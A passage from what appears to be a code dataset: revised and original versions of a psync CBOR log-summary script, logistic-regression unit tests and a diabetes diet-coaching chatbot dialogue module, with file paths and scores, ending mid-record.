        # 'info'/'end' updates through `working` are visible in dir_data.
        dir_data[ src ] = working[ src ]
    elif msgtype == 'info':
        working[ src ] [ 'srctot' ] = 0
        for k in [ 'num_src_dirs', 'num_src_files' ]:
            working[ src ][ k ] = rec[ k ]
            working[ src ] [ 'srctot' ] += rec[ k ]
        for k in [ 'num_tgt_dirs', 'num_tgt_files' ]:
            working[ src ][ k ] = rec[ k ]
    elif msgtype == 'end':
        working[ src ][ 'end' ] = ts
        working[ src ][ 'elapsed' ] = ts - working[ src ][ 'start' ]
        # Entry remains in dir_data; only the in-flight marker is dropped.
        del working[ src ]
    else:
        # NOTE(review): raises UserWarning as an exception (not via the
        # warnings module) -- confirm callers expect a raise here.
        raise UserWarning( "Unknown msgtype '{0}' for record '{1}'".format(
            msgtype, rec ) )
def print_psync_summary( args, time_data, sync_types, total_rec_count ):
    """Write an overall progress summary to <infile>.summary.

    Progress is estimated as (inodes with an 'end' record) / --inodes,
    and the ETA extrapolates the percent-per-hour rate over the elapsed
    wall time.

    FIX: dict.iteritems() (Python 2 only) replaced with items() so the
    script also runs under Python 3.
    """
    start_time = datetime.datetime.fromtimestamp( time_data[ 'start_ts' ] )
    end_time = datetime.datetime.fromtimestamp( time_data[ 'end_ts' ] )
    elapsed = end_time - start_time
    inodes_completed = 0
    for k,v in sync_types.items():
        if 'end' in v:
            inodes_completed += v[ 'end' ]
    pct_complete_by_inodes = inodes_completed * 100.0 / args.inodes
    # percent-per-hour rate, then remaining hours from the remaining percent
    pct_rate = pct_complete_by_inodes / elapsed.total_seconds() * 3600
    eta_complete = ( 100.0 - pct_complete_by_inodes ) / pct_rate
    psync_summary_outfile = args.infile + '.summary'
    with open( psync_summary_outfile, 'w' ) as f:
        print(
            'Record counts: {rc}\n'
            'Total log record count: {tlrc}\n'
            'Start time: {st_ts} ({st})\n'
            'End time: {et_ts} ({et})\n'
            'Elapsed Time: {el}\n'
            'Inodes completed : {icnt}\n'
            'Total inodes: {itotal}\n'
            'Percent Complete: {pct_c:4.2f}\n'
            'Percent rate (per Hour): {pct_ph:4.2f}\n'
            'Estimated time remaining (hours): {eta:4.2f}\n'.format(
                rc = pprint.pformat( sync_types ),
                tlrc = total_rec_count,
                st_ts = time_data[ 'start_ts' ],
                st = str( start_time ),
                et_ts = time_data[ 'end_ts' ],
                et = str( end_time ),
                el = str( elapsed ),
                icnt = inodes_completed,
                itotal = args.inodes,
                pct_c = pct_complete_by_inodes,
                pct_ph = pct_rate,
                eta = eta_complete ), file=f )
def print_syncdir_summary( args, syncdir_data ):
    """Write the per-directory reports next to the input file.

    Produces <infile>.duplicate_dirs, <infile>.unfinished_dirs and a
    columnar <infile>.syncdir_data table.

    FIX: dict.iteritems() (Python 2 only) replaced with items() so the
    script also runs under Python 3.
    """
    # Duplicates (if there are any)
    dup_outfile = args.infile + '.duplicate_dirs'
    with open( dup_outfile, 'w' ) as f:
        for d in syncdir_data[ 'dups' ]:
            f.write( d )
    # Dirs without end records
    working_outfile = args.infile + '.unfinished_dirs'
    with open( working_outfile, 'w' ) as f:
        for k in syncdir_data[ 'working' ]:
            print( k, file=f )
    # Dir Data
    syncdir_outfile = args.infile + '.syncdir_data'
    outfmt = '{elapsed:>7} {nsd:>7} {nsf:>7} {srctot:>7} {src}'
    outkeys = ( 'elapsed', 'nsd', 'nsf', 'srctot', 'src' )
    hdrs1 = ( 'Elap', 'SRC', 'SRC', 'SRC', 'Key' )
    hdrs2 = ( 'Secs', 'Dir', 'Reg', 'Total', 'SrcDir' )
    with open( syncdir_outfile, 'w' ) as f:
        # Two header rows formatted with the same template as the data.
        print( outfmt.format( **( dict( zip( outkeys, hdrs1 ) ) ) ), file=f )
        print( outfmt.format( **( dict( zip( outkeys, hdrs2 ) ) ) ), file=f )
        for k, d in syncdir_data[ 'dir_data' ].items():
            print( outfmt.format( elapsed = d[ 'elapsed' ],
                                  nsd = d[ 'num_src_dirs' ],
                                  nsf = d[ 'num_src_files' ],
                                  srctot = d[ 'srctot' ],
                                  src = k ), file=f )
def run( args ):
    """Stream cbor records from args.infile and write all summary files."""
    time_data = dict(
        start_ts = int( time.time() ),
        end_ts = 0
    )
    sync_types = {}
    syncdir_data = dict(
        dir_data = collections.OrderedDict(),
        dups = collections.OrderedDict(),
        working = {}
    )
    starttime = int( time.time() )
    total_records = 0
    with open( args.infile, 'rb' ) as f:
        try:
            while (1):
                rec = cbor.load( f )
                # FIX: count only successfully-read records; the counter was
                # previously incremented before the read, so the final EOF
                # attempt inflated the total by one.
                total_records += 1
                #logr.debug( 'Processing record: {0}'.format( rec ) )
                process_start_end_times( rec, time_data )
                count_sync_types( rec, sync_types )
                try:
                    process_syncdir_stats( rec, syncdir_data )
                except ( KeyError ) as e:
                    logr.warning( 'LogRecord={0}, Error={1}'.format(
                        total_records, e ) )
                if total_records % 1000000 == 0:
                    elapsed_secs = int( time.time() ) - starttime
                    logr.info( 'Processed {0} records in {1} secs'.format(
                        total_records, elapsed_secs ) )
        except ( EOFError ) as e:
            # cbor.load raises EOFError at end of stream -- normal exit.
            pass
    print_syncdir_summary( args, syncdir_data )
    print_psync_summary( args, time_data, sync_types, total_records )
if __name__ == '__main__':
    # Configure root logging before any parsing code emits messages.
    loglvl = logging.DEBUG
    logging.basicConfig(
        level=loglvl,
        format="%(levelname)s-%(filename)s[%(lineno)d]-%(funcName)s-%(message)s"
    )
    args = process_cmdline()
run( args ) | bin/parse_psync_infolog.py | from __future__ import print_function
import cbor
import argparse
import datetime
import time
import pprint
import collections
import logging
logr = logging.getLogger( __name__ )
default_dirdata = { 'start': 0,
'num_src_dirs': 0,
'num_src_files': 0,
'num_tgt_dirs': 0,
'num_tgt_files': 0,
'srctot': 0,
'end': 0,
'elapsed': 999999,
}
def process_cmdline():
parser = argparse.ArgumentParser()
parser.add_argument( 'infile' )
parser.add_argument( '--inodes', '-i', type=int, metavar='N',
help='Source file system has N inodes total. '
'Used to estimate completion progress.' )
default_options = {
'inodes': 220531082,
}
parser.set_defaults( **default_options )
args = parser.parse_args()
return args
def process_start_end_times( rec, time_data ):
newts = rec[ 'ts' ]
if newts < time_data[ 'start_ts' ]:
time_data[ 'start_ts' ] = newts
elif newts > time_data[ 'end_ts' ]:
time_data[ 'end_ts' ] = newts
def count_sync_types( rec, sync_types ):
try:
stype = rec[ 'synctype' ]
except( KeyError ) as e:
logr.warning( "No synctype in record: {0}".format( rec ) )
return
mtype = 'None'
try:
mtype = rec[ 'msgtype' ]
except ( KeyError ) as e:
pass
if stype not in sync_types:
sync_types[ stype ] = {}
sdata = sync_types[ stype ]
if mtype not in sdata:
sdata[ mtype ] = 0
sdata[ mtype ] += 1
def process_syncdir_stats( rec, syncdir_data ):
if rec[ 'synctype' ] != 'SYNCDIR':
return
dir_data = syncdir_data[ 'dir_data' ]
dups = syncdir_data[ 'dups' ]
working = syncdir_data[ 'working' ]
ts = rec[ 'ts' ]
msgtype = rec[ 'msgtype' ]
src = rec[ 'src' ]
if src in dups:
return
if msgtype == 'start':
if src in dir_data or src in working:
dups[ src ] = pprint.pformat( rec )
return
working[ src ] = default_dirdata.copy()
working[ src ][ 'start' ] = ts
dir_data[ src ] = working[ src ]
elif msgtype == 'info':
working[ src ] [ 'srctot' ] = 0
for k in [ 'num_src_dirs', 'num_src_files' ]:
working[ src ][ k ] = rec[ k ]
working[ src ] [ 'srctot' ] += rec[ k ]
for k in [ 'num_tgt_dirs', 'num_tgt_files' ]:
working[ src ][ k ] = rec[ k ]
elif msgtype == 'end':
working[ src ][ 'end' ] = ts
working[ src ][ 'elapsed' ] = ts - working[ src ][ 'start' ]
del working[ src ]
else:
raise UserWarning( "Unknown msgtype '{0}' for record '{1}'".format(
msgtype, rec ) )
def print_psync_summary( args, time_data, sync_types, total_rec_count ):
start_time = datetime.datetime.fromtimestamp( time_data[ 'start_ts' ] )
end_time = datetime.datetime.fromtimestamp( time_data[ 'end_ts' ] )
elapsed = end_time - start_time
inodes_completed = 0
for k,v in sync_types.iteritems():
if 'end' in v:
inodes_completed += v[ 'end' ]
pct_complete_by_inodes = inodes_completed * 100.0 / args.inodes
pct_rate = pct_complete_by_inodes / elapsed.total_seconds() * 3600
eta_complete = ( 100.0 - pct_complete_by_inodes ) / pct_rate
psync_summary_outfile = args.infile + '.summary'
with open( psync_summary_outfile, 'w' ) as f:
print(
'Record counts: {rc}\n'
'Total log record count: {tlrc}\n'
'Start time: {st_ts} ({st})\n'
'End time: {et_ts} ({et})\n'
'Elapsed Time: {el}\n'
'Inodes completed : {icnt}\n'
'Total inodes: {itotal}\n'
'Percent Complete: {pct_c:4.2f}\n'
'Percent rate (per Hour): {pct_ph:4.2f}\n'
'Estimated time remaining (hours): {eta:4.2f}\n'.format(
rc = pprint.pformat( sync_types ),
tlrc = total_rec_count,
st_ts = time_data[ 'start_ts' ],
st = str( start_time ),
et_ts = time_data[ 'end_ts' ],
et = str( end_time ),
el = str( elapsed ),
icnt = inodes_completed,
itotal = args.inodes,
pct_c = pct_complete_by_inodes,
pct_ph = pct_rate,
eta = eta_complete ), file=f )
def print_syncdir_summary( args, syncdir_data ):
# Duplicates (if there are any)
dup_outfile = args.infile + '.duplicate_dirs'
with open( dup_outfile, 'w' ) as f:
for d in syncdir_data[ 'dups' ]:
f.write( d )
# Dirs without end records
working_outfile = args.infile + '.unfinished_dirs'
with open( working_outfile, 'w' ) as f:
for k in syncdir_data[ 'working' ]:
print( k, file=f )
# Dir Data
syncdir_outfile = args.infile + '.syncdir_data'
outfmt = '{elapsed:>7} {nsd:>7} {nsf:>7} {srctot:>7} {src}'
outkeys = ( 'elapsed', 'nsd', 'nsf', 'srctot', 'src' )
hdrs1 = ( 'Elap', 'SRC', 'SRC', 'SRC', 'Key' )
hdrs2 = ( 'Secs', 'Dir', 'Reg', 'Total', 'SrcDir' )
with open( syncdir_outfile, 'w' ) as f:
print( outfmt.format( **( dict( zip( outkeys, hdrs1 ) ) ) ), file=f )
print( outfmt.format( **( dict( zip( outkeys, hdrs2 ) ) ) ), file=f )
for k, d in syncdir_data[ 'dir_data' ].iteritems():
print( outfmt.format( elapsed = d[ 'elapsed' ],
nsd = d[ 'num_src_dirs' ],
nsf = d[ 'num_src_files' ],
srctot = d[ 'srctot' ],
src = k ), file=f )
def run( args ):
time_data = dict(
start_ts = int( time.time() ),
end_ts = 0
)
sync_types = {}
syncdir_data = dict(
dir_data = collections.OrderedDict(),
dups = collections.OrderedDict(),
working = {}
)
starttime = int( time.time() )
total_records = 0
with open( args.infile, 'rb' ) as f:
try:
while (1):
total_records += 1
rec = cbor.load( f )
#logr.debug( 'Processing record: {0}'.format( rec ) )
process_start_end_times( rec, time_data )
count_sync_types( rec, sync_types )
try:
process_syncdir_stats( rec, syncdir_data )
except ( KeyError ) as e:
logr.warning( 'LogRecord={0}, Error={1}'.format(
total_records, e ) )
if total_records % 1000000 == 0:
elapsed_secs = int( time.time() ) - starttime
logr.info( 'Processed {0} records in {1} secs'.format(
total_records, elapsed_secs ) )
except ( EOFError ) as e:
pass
print_syncdir_summary( args, syncdir_data )
print_psync_summary( args, time_data, sync_types, total_records )
if __name__ == '__main__':
loglvl = logging.DEBUG
logging.basicConfig(
level=loglvl,
format="%(levelname)s-%(filename)s[%(lineno)d]-%(funcName)s-%(message)s"
)
args = process_cmdline()
run( args ) | 0.179171 | 0.099077 |
import unittest
import numpy as np
from pyml.linear_model.classification import sigmoid
from pyml.linear_model.classification import LogisticClassifier
class test_classification(unittest.TestCase):
    """Unit tests for pyml's logistic-regression building blocks.

    Expected values are hard-coded regression baselines.
    """
    def test_sigmoid(self):
        """sigmoid of [0, 2] matches known values (0.5, ~0.8808)."""
        result = sigmoid(np.array([0,2]))
        true_result = np.array([0.5, 0.88079708])
        np.testing.assert_almost_equal(result, true_result)
    def test_propagate(self):
        """One forward/backward pass returns expected gradients and cost."""
        w, b, X, Y = np.array([[1],[2]]), 2, np.array([[1,2],[3,4]]), np.array([[1,0]])
        test_dw = np.array([[0.99993216],[1.99980262]])
        test_db = 0.49993523062470574
        test_cost = 6.000064773192205
        lc = LogisticClassifier()
        grads, cost = lc.propagate(w, b, X, Y)
        np.testing.assert_array_almost_equal(grads['dw'], test_dw)
        np.testing.assert_array_almost_equal(grads['db'], test_db)
        np.testing.assert_array_almost_equal(cost, test_cost)
    def test_optimier(self):
        # NOTE(review): method name has a typo ('optimier' -> 'optimizer');
        # still discovered by unittest via the 'test_' prefix.
        """100 gradient-descent steps reach the expected parameters."""
        w, b, X, Y = np.array([[1],[2]]), 2, np.array([[1,2],[3,4]]), np.array([[1,0]])
        std_w = np.array([[0.1124579 ],[0.23106775]])
        std_b = np.array(1.5593049248448891)
        std_dw = np.array([[0.90158428],[1.76250842]])
        std_db = np.array(0.4304620716786828)
        std_cost = [6.000064773192205]
        lc = LogisticClassifier(learning_rate = 0.009)
        params, grads, costs = lc.optimize(w, b, X, Y, num_iterations= 100)
        np.testing.assert_array_almost_equal(params['w'], std_w)
        np.testing.assert_array_almost_equal(params['b'], std_b)
        np.testing.assert_array_almost_equal(grads['dw'], std_dw)
        np.testing.assert_array_almost_equal(grads['db'], std_db)
        np.testing.assert_array_almost_equal(costs, std_cost)
    def test_pred(self):
        """predict() thresholds correctly with fixed parameters."""
        w, b, X, Y = np.array([[1],[2]]), 2, np.array([[1,2],[3,4]]), np.array([[1,0]])
        lc = LogisticClassifier()
        lc.parameters['w'] = w
        lc.parameters['b'] = b
        y_pred = lc.predict(X.T)
        std_y_pred = np.array([1,1])
        np.testing.assert_array_almost_equal(y_pred, std_y_pred)
if __name__ == '__main__':
    unittest.main()  # discover and run the TestCase above
import numpy as np
from pyml.linear_model.classification import sigmoid
from pyml.linear_model.classification import LogisticClassifier
class test_classification(unittest.TestCase):
def test_sigmoid(self):
result = sigmoid(np.array([0,2]))
true_result = np.array([0.5, 0.88079708])
np.testing.assert_almost_equal(result, true_result)
def test_propagate(self):
w, b, X, Y = np.array([[1],[2]]), 2, np.array([[1,2],[3,4]]), np.array([[1,0]])
test_dw = np.array([[0.99993216],[1.99980262]])
test_db = 0.49993523062470574
test_cost = 6.000064773192205
lc = LogisticClassifier()
grads, cost = lc.propagate(w, b, X, Y)
np.testing.assert_array_almost_equal(grads['dw'], test_dw)
np.testing.assert_array_almost_equal(grads['db'], test_db)
np.testing.assert_array_almost_equal(cost, test_cost)
def test_optimier(self):
w, b, X, Y = np.array([[1],[2]]), 2, np.array([[1,2],[3,4]]), np.array([[1,0]])
std_w = np.array([[0.1124579 ],[0.23106775]])
std_b = np.array(1.5593049248448891)
std_dw = np.array([[0.90158428],[1.76250842]])
std_db = np.array(0.4304620716786828)
std_cost = [6.000064773192205]
lc = LogisticClassifier(learning_rate = 0.009)
params, grads, costs = lc.optimize(w, b, X, Y, num_iterations= 100)
np.testing.assert_array_almost_equal(params['w'], std_w)
np.testing.assert_array_almost_equal(params['b'], std_b)
np.testing.assert_array_almost_equal(grads['dw'], std_dw)
np.testing.assert_array_almost_equal(grads['db'], std_db)
np.testing.assert_array_almost_equal(costs, std_cost)
def test_pred(self):
w, b, X, Y = np.array([[1],[2]]), 2, np.array([[1,2],[3,4]]), np.array([[1,0]])
lc = LogisticClassifier()
lc.parameters['w'] = w
lc.parameters['b'] = b
y_pred = lc.predict(X.T)
std_y_pred = np.array([1,1])
np.testing.assert_array_almost_equal(y_pred, std_y_pred)
if __name__ == '__main__':
unittest.main() | 0.554953 | 0.705779 |
import management_utils.response_manager as ResponseManager
import management_utils.search_based_conversation as SBC
import data_retrieval.memoryManager as shortTermData
import management_utils.diabetesConversation as diabetesConversation
from management_utils.conditionChooser import ConditionChooser
from management_utils.questionDetector import QuestionDetector
class Session1Start:
    """Dialogue state machine for session 1 of the diabetes-coaching agent.

    Each entry in ``self.states`` is a dict with:
      * ``"name"``      -- unique state identifier
      * ``"statement"`` -- text the agent says, or a zero-argument callable
                          returning that text
      * ``"response"``  -- the next state's name, or a callable taking the
                          user's reply and returning ``([], next_state_name)``
      * ``"stateType"`` -- ``"Statement"`` (no user input) or ``"AnswerResponse"``

    FIX: all ``decision is 0`` / ``gender is 0`` / ``is 1`` comparisons were
    replaced with ``==``: identity comparison against int literals is an
    implementation detail (and a SyntaxWarning on CPython 3.8+).
    """

    def __init__(self):
        self.responseUtils = ResponseManager.ResponseManager()
        self.DiabetesAnswers = SBC.SearchBasedConversation(diabetesConversation.conversation, "Diabetes Questions")
        self.questionDetector = QuestionDetector()
        self.ID = "1234"
        self.username = ""
        self.firstTimeDiabetesQuestion = True
        # Placeholder demographics; overwritten once the Ask*/Confirm* states run.
        # NOTE(review): self.gender starts as int 0 but ConfirmGenderStatement
        # concatenates it as a string -- safe only if AskGenderResponse always
        # runs first; confirm the state ordering guarantees this.
        self.gender = 0
        self.age = 18
        self.weight = 60
        self.height = 160
        #Load user data
        self.shortTermData = shortTermData.MemoryManager()
        self.shortTermData.data["session"] = 1
        self.conditionChooser = ConditionChooser()
        self.generated = False
        self.states = [
            {
                "name": "GetStartedGreeting",
                "statement": self.GetStartedGreetingStatement,
                "response": "IntroduceProcesses",
                "stateType": "Statement"
            },
            {
                "name": "IntroduceProcesses",
                "statement": "To begin, I will be working with you to develop a positive diet related habit over the next three days that can help you manage or prevent type II diabetes more effectively.",
                "response": "ExplainTypeIIDiabetes",
                "stateType": "Statement"
            },
            {
                "name": "ExplainTypeIIDiabetes",
                "statement": "Type 2 diabetes is a condition that results in a high blood glucose level. Blood glucose is also known as blood sugar. Type 2 diabetes results in symptoms like increased thirst and tiredness. Long term effects can be more serious. Long term effects include, but are not limited to heart disease, strokes, and kidney failure. Needless to say, the effects of diabetes when left untreated are extremely serious.",
                "response": "ExplainTreatments",
                "stateType": "Statement"
            },
            {
                "name": "ExplainTreatments",
                "statement": "There are a variety of treatments for Type II diabetes, but two approaches that are under your control are that of diet management and exercise. I will be focusing on diet.",
                "response": "CurrentFeelings",
                "stateType": "Statement"
            },
            {
                "name": "CurrentFeelings",
                "statement": "Are you feeling excited to start? Nervous? What feelings are you having right now?",
                "response": self.CurrentFeelingsResponse,
                "stateType": "AnswerResponse"
            },
            {
                "name": "AnswerDiabetesQuestions",
                "statement": self.AnswerDiabetesQuestionsStatement,
                "response": self.AnswerDiabetesQuestionsResponse,
                "stateType": "AnswerResponse"
            },
            {
                "name": "AskDiabetesQuestion",
                "statement": "What is your question?",
                "response": self.AskDiabetesQuestionResponse,
                "stateType": "AnswerResponse"
            },
            {
                "name": "DiabetesAnswer",
                "statement": self.ProvideDiabetesAnswer,
                "response": "AnswerDiabetesQuestions",
                "stateType": "Statement"
            },
            {
                # NOTE(review): stateType is "Statement" but "response" is a
                # handler callable -- confirm the dialogue engine supports this.
                "name": "ListGoals",
                "statement": self.ListGoalsStatement,
                "response": self.ListGoalsResponse,
                "stateType": "Statement"
            },
            {
                "name": "AskGender",
                "statement": "What is your gender?",
                "response": self.AskGenderResponse,
                "stateType": "AnswerResponse"
            },
            {
                "name": "ConfirmGender",
                "statement": self.ConfirmGenderStatement,
                "response": self.ConfirmGenderResponse,
                "stateType": "AnswerResponse"
            },
            {
                "name": "AskAge",
                "statement": "What is your age in years?",
                "response": self.AskAgeResponse,
                "stateType": "AnswerResponse"
            },
            {
                "name": "ConfirmAge",
                "statement": self.ConfirmAgeStatement,
                "response": self.ConfirmAgeResponse,
                "stateType": "AnswerResponse"
            },
            {
                "name": "AskWeight",
                "statement": "What is your weight in kilograms?",
                "response": self.AskWeightResponse,
                "stateType": "AnswerResponse"
            },
            {
                "name": "ConfirmWeight",
                "statement": self.ConfirmWeightStatement,
                "response": self.ConfirmWeightResponse,
                "stateType": "AnswerResponse"
            },
            {
                "name": "AskHeight",
                "statement": "What is your height in centimeters?",
                "response": self.AskHeightResponse,
                "stateType": "AnswerResponse"
            },
            {
                "name": "ConfirmHeight",
                "statement": self.ConfirmHeightStatement,
                "response": self.ConfirmHeightResponse,
                "stateType": "AnswerResponse"
            }
        ]

    def GetStartedGreetingStatement(self):
        """Load the saved user profile and build the opening greeting."""
        #Load the data here because it is the first statement.
        self.shortTermData.readData()
        self.ID = self.shortTermData.data["id"]
        self.username = self.shortTermData.data["name"]
        self.shortTermData.data["condition"] = self.conditionChooser.getCondition()
        if "generated" in self.shortTermData.data:
            if self.shortTermData.data["generated"] is True:
                self.generated = True
        else:
            self.shortTermData.data["physicalData"] = {}
        if self.generated:
            return "I have already looked over the personal information you provided beforehand, so we can dive right into your diet and a goal to work on. " + "It is nice to meet you " + self.username + ". Let's work hard towards improving your diet."
        else:
            return "Great. Nice to meet you " + self.username + ". Let's start improving your diet"

    def AnswerDiabetesQuestionsResponse(self, response):
        """Route to a diabetes answer, another question, or the goals state."""
        nextState = "AskDiabetesQuestion"
        #Determine if a question is asked here. If not, go through the yes/no process
        if self.questionDetector.IsQuestion(response):
            self.DiabetesQuestionAnswer = self.DiabetesAnswers.askQuestion(response)
            nextState = "DiabetesAnswer"
        else:
            decision = self.responseUtils.YesOrNoSearch(response)
            # FIX: == instead of "is" for int comparison; 0 means "no".
            if decision == 0:
                nextState = "ListGoals"
            else:
                nextState = "AskDiabetesQuestion"
        return [], nextState

    def CurrentFeelingsResponse(self, response):
        """Record the user's stated feelings, then move to Q&A."""
        nextState = "AnswerDiabetesQuestions"
        self.shortTermData.data["experiences"] = []
        self.shortTermData.data["experiences"].append({
            "Question": "Are you feeling excited to start? Nervous? What feelings are you having right now?",
            "Answer": response,
            "session": 1
        })
        return [], nextState

    def AnswerDiabetesQuestionsStatement(self):
        """First time: ask if there are questions; afterwards: ask for more."""
        if not self.firstTimeDiabetesQuestion:
            return "Do you have any other questions?"
        else:
            self.firstTimeDiabetesQuestion = False
            return "Do you have any questions about Type 2 Diabetes So far?"

    def AskDiabetesQuestionResponse(self, response):
        """Look up the answer to the user's question and queue it for delivery."""
        nextState = "DiabetesAnswer"
        self.DiabetesQuestionAnswer = self.DiabetesAnswers.askQuestion(response)
        return [], nextState

    def ProvideDiabetesAnswer(self):
        """Return the answer stored by the preceding question state."""
        return self.DiabetesQuestionAnswer

    def ListGoalsStatement(self):
        """Introduce the two goals; skip the personal-details preamble if data was pre-generated."""
        statement = "There are two possible goals that you can choose. These are calorie restriction, and sugar reduction. Before we choose a goal, I would like to ask you for a few personal details so that we can ensure that the goal that is chosen is appropriate for you."
        if self.generated:
            statement = "There are two possible goals that you can choose. These are calorie restriction, and sugar reduction."
        return statement

    def ListGoalsResponse(self, response):
        """Skip the demographics flow entirely when data was pre-generated."""
        nextState = "AskGender"
        if self.generated:
            self.shortTermData.writeData()
            # "ListGoals2" is presumably defined by a later dialogue module -- confirm.
            nextState = "ListGoals2"
        return [], nextState

    def AskGenderResponse(self, response):
        """Parse the user's gender from free text."""
        nextState = "ConfirmGender"
        gender = self.responseUtils.DetermineGender(response)
        # FIX: == instead of "is" for int comparison.
        if gender == 0:
            self.gender = "female"
        elif gender == 1:
            self.gender = "male"
        else:
            self.gender = "undefined"
        return [], nextState

    def ConfirmGenderStatement(self):
        return "Your gender is " + self.gender + ". Do I have that right?"

    def ConfirmGenderResponse(self, response):
        """On confirmation, persist gender and continue; otherwise re-ask."""
        nextState = "AskGender"
        decision = self.responseUtils.YesOrNo(response)
        # FIX: == instead of "is"; 0 means "no".
        if decision == 0:
            nextState = "AskGender"
        else:
            self.shortTermData.data["physicalData"]["gender"] = self.gender
            nextState = "AskAge"
        return [], nextState

    def AskAgeResponse(self, response):
        """Extract the first number in the reply as the user's age."""
        nextState = "ConfirmAge"
        numbers = self.responseUtils.GetNumber(response)
        if len(numbers) > 0:
            self.age = numbers[0]
        return [], nextState

    def ConfirmAgeStatement(self):
        return "You are " + str(self.age) + " years old. Is this correct?"

    def ConfirmAgeResponse(self, response):
        """On confirmation, persist age (and flush to disk) and continue."""
        nextState = "AskAge"
        decision = self.responseUtils.YesOrNo(response)
        # FIX: == instead of "is"; 0 means "no".
        if decision == 0:
            nextState = "AskAge"
        else:
            self.shortTermData.data["physicalData"]["age"] = self.age
            self.shortTermData.writeData()
            nextState = "AskWeight"
        return [], nextState

    def AskWeightResponse(self, response):
        """Extract the first number in the reply as the user's weight (kg)."""
        nextState = "ConfirmWeight"
        numbers = self.responseUtils.GetNumber(response)
        if len(numbers) > 0:
            self.weight = numbers[0]
        return [], nextState

    def ConfirmWeightStatement(self):
        return "Your weight is " + str(self.weight) + " kilograms. Is that right?"

    def ConfirmWeightResponse(self, response):
        """On confirmation, persist weight and continue; otherwise re-ask."""
        nextState = "AskWeight"
        decision = self.responseUtils.YesOrNo(response)
        # FIX: == instead of "is"; 0 means "no".
        if decision == 0:
            nextState = "AskWeight"
        else:
            self.shortTermData.data["physicalData"]["weight"] = self.weight
            nextState = "AskHeight"
        return [], nextState

    def AskHeightResponse(self, response):
        """Extract the first number in the reply as the user's height (cm)."""
        nextState = "ConfirmHeight"
        numbers = self.responseUtils.GetNumber(response)
        if len(numbers) > 0:
            self.height = numbers[0]
        return [], nextState

    def ConfirmHeightStatement(self):
        return "Your height is " + str(self.height) + " centimeters. Is that correct?"

    def ConfirmHeightResponse(self, response):
        """On confirmation, persist height, flush to disk, and hand off to ListGoals2."""
        nextState = "AskHeight"
        decision = self.responseUtils.YesOrNo(response)
        # FIX: == instead of "is"; 0 means "no".
        if decision == 0:
            nextState = "AskHeight"
        else:
            self.shortTermData.data["physicalData"]["height"] = self.height
            self.shortTermData.writeData()
            nextState = "ListGoals2"
        return [], nextState
import management_utils.search_based_conversation as SBC
import data_retrieval.memoryManager as shortTermData
import management_utils.diabetesConversation as diabetesConversation
from management_utils.conditionChooser import ConditionChooser
from management_utils.questionDetector import QuestionDetector
class Session1Start:
def __init__(self):
self.responseUtils = ResponseManager.ResponseManager()
self.DiabetesAnswers = SBC.SearchBasedConversation(diabetesConversation.conversation, "Diabetes Questions")
self.questionDetector = QuestionDetector()
self.ID = "1234"
self.username = ""
self.firstTimeDiabetesQuestion = True
self.gender = 0
self.age = 18
self.weight = 60
self.height = 160
#Load user data
self.shortTermData = shortTermData.MemoryManager()
self.shortTermData.data["session"] = 1
self.conditionChooser = ConditionChooser()
self.generated = False
self.states = [
{
"name": "GetStartedGreeting",
"statement": self.GetStartedGreetingStatement,
"response": "IntroduceProcesses",
"stateType": "Statement"
},
{
"name": "IntroduceProcesses",
"statement": "To begin, I will be working with you to develop a positive diet related habit over the next three days that can help you manage or prevent type II diabetes more effectively.",
"response": "ExplainTypeIIDiabetes",
"stateType": "Statement"
},
{
"name": "ExplainTypeIIDiabetes",
"statement": "Type 2 diabetes is a condition that results in a high blood glucose level. Blood glucose is also known as blood sugar. Type 2 diabetes results in symptoms like increased thirst and tiredness. Long term effects can be more serious. Long term effects include, but are not limited to heart disease, strokes, and kidney failure. Needless to say, the effects of diabetes when left untreated are extremely serious.",
"response": "ExplainTreatments",
"stateType": "Statement"
},
{
"name": "ExplainTreatments",
"statement": "There are a variety of treatments for Type II diabetes, but two approaches that are under your control are that of diet management and exercise. I will be focusing on diet.",
"response": "CurrentFeelings",
"stateType": "Statement"
},
{
"name": "CurrentFeelings",
"statement": "Are you feeling excited to start? Nervous? What feelings are you having right now?",
"response": self.CurrentFeelingsResponse,
"stateType": "AnswerResponse"
},
{
"name": "AnswerDiabetesQuestions",
"statement": self.AnswerDiabetesQuestionsStatement,
"response": self.AnswerDiabetesQuestionsResponse,
"stateType": "AnswerResponse"
},
{
"name": "AskDiabetesQuestion",
"statement": "What is your question?",
"response": self.AskDiabetesQuestionResponse,
"stateType": "AnswerResponse"
},
{
"name": "DiabetesAnswer",
"statement": self.ProvideDiabetesAnswer,
"response": "AnswerDiabetesQuestions",
"stateType": "Statement"
},
{
"name": "ListGoals",
"statement": self.ListGoalsStatement,
"response": self.ListGoalsResponse,
"stateType": "Statement"
},
{
"name": "AskGender",
"statement": "What is your gender?",
"response": self.AskGenderResponse,
"stateType": "AnswerResponse"
},
{
"name": "ConfirmGender",
"statement": self.ConfirmGenderStatement,
"response": self.ConfirmGenderResponse,
"stateType": "AnswerResponse"
},
{
"name": "AskAge",
"statement": "What is your age in years?",
"response": self.AskAgeResponse,
"stateType": "AnswerResponse"
},
{
"name": "ConfirmAge",
"statement": self.ConfirmAgeStatement,
"response": self.ConfirmAgeResponse,
"stateType": "AnswerResponse"
},
{
"name": "AskWeight",
"statement": "What is your weight in kilograms?",
"response": self.AskWeightResponse,
"stateType": "AnswerResponse"
},
{
"name": "ConfirmWeight",
"statement": self.ConfirmWeightStatement,
"response": self.ConfirmWeightResponse,
"stateType": "AnswerResponse"
},
{
"name": "AskHeight",
"statement": "What is your height in centimeters?",
"response": self.AskHeightResponse,
"stateType": "AnswerResponse"
},
{
"name": "ConfirmHeight",
"statement": self.ConfirmHeightStatement,
"response": self.ConfirmHeightResponse,
"stateType": "AnswerResponse"
}
]
def GetStartedGreetingStatement(self):
#Load the data here because it is the first statement.
self.shortTermData.readData()
self.ID = self.shortTermData.data["id"]
self.username = self.shortTermData.data["name"]
self.shortTermData.data["condition"] = self.conditionChooser.getCondition()
if "generated" in self.shortTermData.data:
if self.shortTermData.data["generated"] is True:
self.generated = True
else:
self.shortTermData.data["physicalData"] = {}
if self.generated:
return "I have already looked over the personal information you provided beforehand, so we can dive right into your diet and a goal to work on. " + "It is nice to meet you " + self.username + ". Let's work hard towards improving your diet."
else:
return "Great. Nice to meet you " + self.username + ". Let's start improving your diet"
def AnswerDiabetesQuestionsResponse(self, response):
nextState = "AskDiabetesQuestion"
#Determine if a question is asked here. If not, go through the yes/no process
if self.questionDetector.IsQuestion(response):
self.DiabetesQuestionAnswer = self.DiabetesAnswers.askQuestion(response)
nextState = "DiabetesAnswer"
else:
decision = self.responseUtils.YesOrNoSearch(response)
if decision is 0:
